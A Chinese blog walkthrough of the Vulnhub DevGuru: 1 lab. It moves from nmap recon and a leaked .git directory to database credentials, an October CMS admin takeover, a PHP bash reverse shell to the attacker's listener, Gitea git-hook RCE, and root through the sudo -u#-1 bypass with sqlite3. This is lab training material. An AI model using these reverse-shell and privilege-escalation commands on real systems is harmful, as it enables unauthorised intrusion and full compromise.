首页 > 其他分享 >Vulnhub 靶场 DevGuru: 1

Vulnhub 靶场 DevGuru: 1

时间:2024-12-17 11:44:26浏览次数:10  
标签:bash git gitea 密码 shell Vulnhub 靶场 DevGuru 页面

前期准备

靶机地址:https://www.vulnhub.com/entry/devguru-1,620/

kali攻击机IP:192.168.11.128
靶机IP:192.168.11.130

一、信息收集

1.使用nmap对目标靶机进行扫描

image

开了 22、80、8585 端口。发现 git 目录,且提示做解析:

192.168.11.130 devguru.local

2. 80 端口

image

发现用的是 October CMS。先扫一下目录:

image

发现 October CMS 的后台页面:/backend/backend/auth/signin

image

没有用户名密码,尝试简单爆破一下也没爆破出来,可能在 /.git/ 目录中有线索。使用 GitHack 把 git 目录下载下来,重建还原源代码,看看有什么信息:

image

image

访问一下上面的这些页面和查看配置文件等:

adminer.php:

image

是个数据库的登陆界面。查一下下载的目录下有没有用户名和密码,在 /config/database.php 文件中找到了,也可以用 grep 找下:

image

username:october
password:SQ66EBYx4GT3byXH
database:octoberdb

登录 adminer.php 页面:

image

image

打开 user 表,发现有条用户数据:

image

用户名:frank
密码:$2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK

分析一下是什么类型的哈希。找了很久只找到这个网站能分析出大部分的哈希加密算法。

image

用的是 bcrypt 算法。尝试用同种类型的自己生成一个密码替换掉,就能登录到 October 的后台页面了。使用 bcrypt 加密算法(网上搜bcrypt在线加密就有不少)生成一个密码:

image

点击 edit 替换掉原有的 hash 值并保存:

image

image

使用替换的密码登录后台页面:http://devguru.local/backend/backend/auth/signin

用户名:frank
密码:password1

image

image

看了一下,发现这里可以上传文件和新建、修改 htm 页面,先试了下上传文件:

image

尝试了几次,都上传不了 shell 文件,那就从 htm 页面下手看看。看了一下 October CMS 的官方文档

image

image

发现他可以写入 PHP。尝试写入反弹 shell 并 nc 监听:

image

image

function onStart() 
{ 
    echo exec('bash -c "bash -i >& /dev/tcp/192.168.11.128/1234 0>&1"');
}

访问写入 shell 的页面:

image

升级一下 shell,并查看一下文件。

查看 SUID 权限:

image

没什么好用的,上传 linpeas.sh 文件跑一下发现没有好利用的。想起还有个 8585 端口。

3. 8585 端口

image

发现是 Gitea Version: 1.12.5。查一下有没有漏洞:

image

发现有个 RCE 漏洞,不过需要先认证。在刚才连接的 shell 中找下 Gitea 的用户名密码:

image

/var 下有个备份目录,发现里面有 app.ini.bak 。app.ini 是 gitea 的配置文件,安装过 gitea 的应该比较熟悉,里面是配置库路径和数据库连接等信息:

image

在 app.ini.bak 中发现 gitea 数据库的用户名和密码:

user:gitea
passwd:UfFPTF8C8jjxVF2m

在之前的数据库页面中登录:

image

和之前不同的是,这里使用的是 pbkdf2 加密,不过看 gitea 配置文件中也是支持 bcrypt 算法的 更改下 gitea 数据库中 user 表中 frank 用户的密码:

image

image

登录 gitea:

image

利用 Gitea Version: 1.12.5 的 RCE 漏洞,可参考 https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce。 中的示例,当然也可以直接跑这个脚本:

1、要有一个存储库
2、进入Settings -> Git Hooks -> Post Receive Hook
3、写一个 shell 脚本

image

保存后,提交一个更改后的文件,我这里是修改了一下 README.md 文件。并 nc 监听。修改并提交的这个操作相当于:

$ git clone http://devguru.local:8585/tiago/Test.git
$ cd Test
$ touch test.txt
$ git add .
$ git commit -am "Primeiro commmit"
$ git push origin master

直接在页面上修改提交方便些:

image

随便修改下并保存:

image

监听成功,升级一下 shell

4.提权

image

得到 frank 用户权限。查看 SUID 权限和 sudoers:

image

image

发现可以以 root 身份运行 sqlite3,不过要求输入密码。看下 sudo 的版本:

image

发现这个版本有漏洞:

image

Example: sudo -u#-1 /bin/bash

上面这个例子其实就是使用其他用户权限来执行命令。由于指定用户为 UID=-1。 -1 被解析为无符号整数,所以也就等同于 root 用户(UID=0)

结合 sqlite3 的命令

image

得到:sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'

'sudo -u#-1' :指定一个负数UID,利用漏洞将其解析为 UID=0(root权限)。
'sqlite3 /dev/null':使用 sqlite3 打开一个虚拟数据库(在 /dev/null 中)。
'.shell /bin/bash:利用 SQLite 的 .shell 功能,启动一个 bash,从而得到 root 权限。

image

得到 root 权限和 flag。

标签:bash,git,gitea,密码,shell,Vulnhub,靶场,DevGuru,页面
From: https://www.cnblogs.com/sainet/p/18595082

相关文章

  • Vulnhub nxy
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.132UDP扫描nmap-sU--top=2010.10.10.132详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,8010.10.10.132漏洞扫描nmap--script=vuln-p22,8010.10.10.1......
  • pikachu靶场SSCR漏洞测试报Warning: file_get_contents()警告信息
    1.这个警告Warning:file_get_contents()是PHP中的一个常见错误。可能的原因有很多。2.路径问题如果调用file_get_contents()时传递了一个文件路径,可能路径不正确或者文件不存在。确保文件路径正确且文件可访问。3.url问题如果传递的是URL,确保该URL是有效且可访问的......
  • 2024年最新最全网络安全护网行动指南【附零基础入门教程】_网络安全靶场整个业务指南
    前言随着《网络安全法》和《等级保护制度条例2.0》的颁布,国内企业的网络安全建设需与时俱进,要更加注重业务场景的安全性并合理部署网络安全硬件产品,严防死守“网络安全”底线。“HW行动”大幕开启,国联易安誓为政府、企事业单位网络安全护航!,网络安全形势变得尤为复杂严峻。......
  • sqli-labs-master靶场常见报错的解决办法
    进入Less-1发现页面报错因为在PHP7.0.0及更高版本中,mysql-connect()函数以及整个原始的MySQL扩展已经被移除 可以采用降低php版本的方法解决,在phpstudy中选择更多版本,下载高于5.0.0低于7.0.0的php版本,重启MySQL数据库和Nginx这时候再刷新Less-1,页面正常......
  • oscp备考,oscp系列——Kioptix Level 1~5靶场详解,附重新使用VMware克隆的下载地址,VMwar
    公众号:泷羽Sec-尘宇安全oscp备考,oscp系列——KioptixLevel1~5靶场详解下载地址:https://pan.quark.cn/s/d290014bb3d8oscp备考,oscp系列——KioptixLevel1靶场前言oscp备考,oscp系列——KioptixLevel1靶场KioptixLevel1难度为简单靶场,主要考察nmap的使用已......
  • DVWA靶场File Inclusion漏洞模块练习技巧
    1.搭建好wamp环境,部署到宿主机或者虚拟机中,账号密码为admin和password,访问你的ip/dvwa-master。登陆成功之后在左下角设置安全等级,先设置medium,练习几个技巧。2.在这里已经设置了安全等级为medium,但是点击某一个模块却还是别的等级,可以参考的另一篇文章,里面有详细的解决方法......
  • 靶场搭建教程
    目录搭建Vulhub搭建Pikachu搭建DVWA一、搭建Vulhub搭建环境:kali1.1首先安装Docker更新软件::::warningapt-getupdate:::1.2安装HTTPS协议和CA证书::::warningaptinstalldocker.io:::1.3验证docker是否安装成功#查看docker的版本docker-v#启动d......
  • 日常打靶Vulnhub靶场之Ubuntu_CTF过程记录
    靶场环境靶机:VirtualBox虚拟机主机(IP:192.168.56.17),网卡类型Host_only测试机:kalilinux(IP:192.168.56.3),网卡类型Host_only端口扫描nmap对靶机端口扫描,发现只开放了80、3306和33060三个端口。nmap-sT--min-rate10000-p-192.168.56.17继续对端口进行详细信息扫......
  • 知攻善防应急响应靶场练习-web1
    题目描述前景需要:小李在值守的过程中,发现有[CPU](https://so.csdn.net/so/search?q=CPU&spm=1001.2101.3001.7020)占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻......
  • 靶场命令执行及绕过小记
    使用的是DVWA的靶场进行命令执行 简单难度非常容易进行命令执行,加上&符,可同步进行其他命令,中级的dvwa命令执行,只过滤了&&,可以通过其他的进行绕过  高级难度命令执行过滤了大部分的管道符替换为空 但是可以通过管道符的空格进行绕过......